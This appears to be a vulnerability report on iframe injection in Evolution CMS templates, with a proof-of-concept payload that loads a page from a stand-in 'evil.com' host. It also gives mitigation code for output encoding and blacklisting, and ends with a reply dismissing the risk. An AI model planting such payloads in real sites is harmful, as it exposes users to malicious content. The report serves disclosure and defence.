I-Frame Injection Vulnerability

Risk Description
Malware attackers use this iframe to include malware websites. They are able to include the webpage as a one-pixel square (you won't be able to see it in the webpage) and obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F, leaving no obvious clue that it's malicious. Using iframe injection, an attacker can inject advertisements inside any other website, insert malware-infected site links, redirect to malware-infected sites and more.
POC
1. Log in to the Evolution CMS application.
2. Go to the template location and try to create a new template.
3. Insert the payload in the description location and in the template name as `"/><iframe/src="https://evil.com"></iframe>`
4. Save and close the template.
5. Now open the template list like below; you will get the iframe, which is running the malicious content.
Mitigation:

1. You should include the Content Security Policy frame-ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X-Frame-Options header with value DENY, SAMEORIGIN or ALLOW-FROM uri. X-Frame-Options takes precedence over CSP frame-ancestors in some browsers.
2. You could additionally have some JavaScript "frame-breaker" code that will prevent your website from being "framed" in older browsers.

• Output encoding: It is recommended to implement 'output encoding' to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding function:

```java
import java.text.StringCharacterIterator;

public static String HTMLEncode(String aTagFragment) {
    final StringBuffer result = new StringBuffer();
    final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
    char character = iterator.current();
    while (character != StringCharacterIterator.DONE) {
        if (character == '<')
            result.append("&lt;");
        else if (character == '>')
            result.append("&gt;");
        else if (character == '"')
            result.append("&quot;");
        else if (character == '\'')
            result.append("&#039;");
        else if (character == '\\')
            result.append("&#092;");
        else if (character == '&')
            result.append("&amp;");
        else {
            // the char is not a special one
            // add it to the result as is
            result.append(character);
        }
        character = iterator.next();
    }
    return result.toString();
}
```

• Escaping: Escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. ESAPI API:

```java
String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
```

• Filtering input parameters: Positive or "whitelist" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black-list filtering works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: < > " ' % ; ) ( & + -
JavaScript code:

```javascript
function RemoveBad(strTemp) {
  // Strip every blacklisted character (the original regex left ( ) + unescaped and did not compile).
  strTemp = strTemp.replace(/[<>"'%;()&+-]/g, "");
  return strTemp;
}
```
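As an added example (this is not Evolution CMS code and not part of the report above), the following JavaScript shows why the reported template-name payload works when the stored name is written into an HTML attribute without encoding, and how the output encoding recommended in the mitigation neutralizes it, while the RemoveBad-style blacklist also destroys legitimate names. The template-list markup, the function names and the sample template name are constructed for illustration.

```javascript
// Added example (not Evolution CMS code): why the reported template-name payload
// escapes an HTML attribute, and how output encoding stops it.
// The template-list markup is a constructed stand-in for the real admin page.

// Payload from the issue, as it would be stored in the template name field.
const PAYLOAD = '"/><iframe/src="https://evil.com"></iframe>';

// Vulnerable pattern: the stored name is concatenated straight into a quoted
// attribute, so a leading " closes the attribute and /> closes the tag.
function renderRowUnsafe(templateName) {
  return '<input type="text" name="templatename" value="' + templateName + '">';
}

// Output encoding for HTML element-content and quoted-attribute contexts:
// every character that can end an attribute, open a tag or start an entity
// is replaced by its entity, so the browser treats the value as data.
function encodeForHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened pattern: same markup, value encoded at the point of output.
function renderRowSafe(templateName) {
  return '<input type="text" name="templatename" value="' + encodeForHtml(templateName) + '">';
}

// Counts element openers (<tagname) in rendered markup; a single row should
// contain exactly one, the <input> we emit ourselves.
function countElements(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Blacklist filter in the style of the mitigation's RemoveBad, with a valid
// regex. Included to show that character stripping also destroys legitimate names.
function removeBad(str) {
  return str.replace(/[<>"'%;()&+-]/g, '');
}

// Demonstration on the payload and on a harmless (constructed) template name
// that happens to contain blacklisted characters.
console.log(renderRowUnsafe(PAYLOAD));            // two elements: <input> and the injected <iframe>
console.log(renderRowSafe(PAYLOAD));              // one element; the payload is inert text
console.log(removeBad('Q&A template (v2)'));      // "QA template v2": data lost
console.log(encodeForHtml('Q&A template (v2)'));  // "Q&amp;A template (v2)": data kept
```

Run it with `node` to see the two renderings side by side. The encoding variant is the one to prefer: it keeps the stored name intact and only changes how it is written into the page, whereas the blacklist silently corrupts any name containing `&`, `(` or `)`.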
The payload will execute in a separate environment because of its "iframe policy", so there is no worry about this =].
So in fact `<iframe src="evil.com/shell.php">` will run shell.php on the remote evil.com instead of the Evolution server, and JS doesn't have the privilege to inject itself into the local DOM object :)
The fix is contrary to the access policy in the administration panel. Having access to create templates / snippets / chunks or plug-ins, you can execute arbitrary code. Therefore, XSS is not something that we should worry about.